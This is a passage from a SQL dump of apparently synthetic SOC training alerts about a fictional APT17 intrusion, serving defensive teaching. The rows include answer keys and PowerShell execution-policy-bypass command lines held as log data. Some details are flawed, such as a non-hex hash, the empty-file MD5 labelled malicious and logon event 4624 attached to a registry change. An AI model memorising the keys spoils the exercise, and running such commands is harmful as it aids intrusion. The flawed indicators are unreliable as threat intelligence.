phishing.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.518Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1201, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Following successful phishing, APT17 executed a custom payload designed to bypass traditional antivirus solutions and establish control over the compromised system. The payload was detected executing on a Windows endpoint, aiming to establish a foothold within the network.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_type\":\"process\",\"host_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"fa26be19de6bff93f70bc2308434e4a440bbad02\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"malicious.ps1\",\"detected_by\":\"EDR\",\"threat_level\":\"high\"}', '2026-02-07 21:24:15', '2026-02-21 03:16:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fa26be19de6bff93f70bc2308434e4a440bbad02\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT17.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell script intended for execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"clean\",\"details\":\"Legitimate user whose credentials were compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1202, 'Registry Modification Detected', 'medium', 'Host-based Intrusion Detection System', 'Detected suspicious registry modification activity associated with APT17. The modification ensures malware persistence through system reboots and user logins.', 'Persistence', 'T1112 - Modify Registry', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"DESKTOP-1A2B3C\",\"user\":{\"id\":\"S-1-5-21-123456789-234567890-345678901-1001\",\"name\":\"jdoe\",\"domain\":\"WORKGROUP\"}},\"event_data\":{\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"Updater\",\"registry_value\":\"\\\"C:\\\\Program Files\\\\Updater\\\\updater.exe\\\"\",\"process_id\":\"4748\",\"process_name\":\"regedit.exe\",\"network_info\":{\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-02-07 21:24:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash linked to APT17 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in persistence mechanisms.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"internal\",\"details\":\"User account of logged-in user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:59:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:58:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:57:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:56:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1203, 'Credential Dumping Activity', 'high', 'Security Information and Event Management (SIEM)', 'APT17 is utilizing harvested credentials to attempt lateral movement within the network. The objective is to access critical assets, thus deepening their infiltration. This activity involves the use of known malicious tools and compromised credentials, indicating an attempt to expand control over internal systems.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"username\":\"jdoe_admin\",\"event_type\":\"credential_dumping_attempt\",\"malware_filename\":\"Mimikatz.exe\",\"malware_hash\":\"12a3b456c789d012e34f5678g9012h34\",\"device\":\"Windows Server 2019\",\"action\":\"Attempted access to critical assets using dumped credentials\",\"outcome\":\"Blocked\"}', '2026-02-07 21:24:15', '2026-02-21 05:08:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT17 C2 server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Server targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Compromised admin account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"AV Scans\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"12a3b456c789d012e34f5678g9012h34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1204, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Anomaly Detection', 'In the final stage, APT17 uses encrypted communications to stealthily exfiltrate valuable data, completing their espionage mission while minimizing detection.', 'Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:52:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"encryption\":\"TLSv1.2\",\"file_hash\":\"7b50c2a1b2f3e3b5f0a1c2d3e4f5a6b7c8d9e0f1\",\"filename\":\"confidential_report.pdf\",\"username\":\"jdoe\",\"action\":\"data_exfiltration\"}', '2026-02-07 21:24:15', '2026-02-21 03:15:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7b50c2a1b2f3e3b5f0a1c2d3e4f5a6b7c8d9e0f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated file known to contain sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"document_tracking\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document exfiltrated via encrypted channel.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_log\",\"verdict\":\"suspicious\",\"details\":\"User account involved in anomalous data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1205, 'Suspicious Web Traffic Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'APT17 has compromised a popular website frequented by employees of the targeted Japanese organizations. They are using it to deliver malicious payloads exploiting the Internet Explorer zero-day vulnerability (CVE-2013-3893). Initial access attempt detected via suspicious web traffic from a known malicious IP.', 'Initial Access', 'T1189: Drive-by Compromise', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"src_ip\":\"203.0.113.24\",\"dst_ip\":\"10.0.0.15\",\"src_port\":80,\"dst_port\":50232,\"protocol\":\"HTTP\",\"http_method\":\"GET\",\"http_url\":\"http://compromised-website.com/exploit\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_rule\":\"Exploit-Kit-Detected\"}', '2026-02-07 21:24:22', '2026-02-19 15:56:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT17 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal employee workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-website.com/exploit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Website compromised by APT17 for watering hole attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 exploit delivery.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1206, 'Malware Execution Attempt Logged', 'medium', 'Endpoint Detection and Response (EDR)', 'Upon visiting the compromised site, the malicious payload is executed on the victim\'s machine, initiating the first step towards establishing a foothold within the network.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:07Z\",\"event_id\":\"EDR-123456\",\"computer_name\":\"WIN-10-PC\",\"user\":\"john_doe\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\john_doe\\\\Downloads\\\\malicious_script.ps1\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.5\",\"detected_by\":\"EDR Agent v3.2\"}', '2026-02-07 21:24:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious script file executed\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
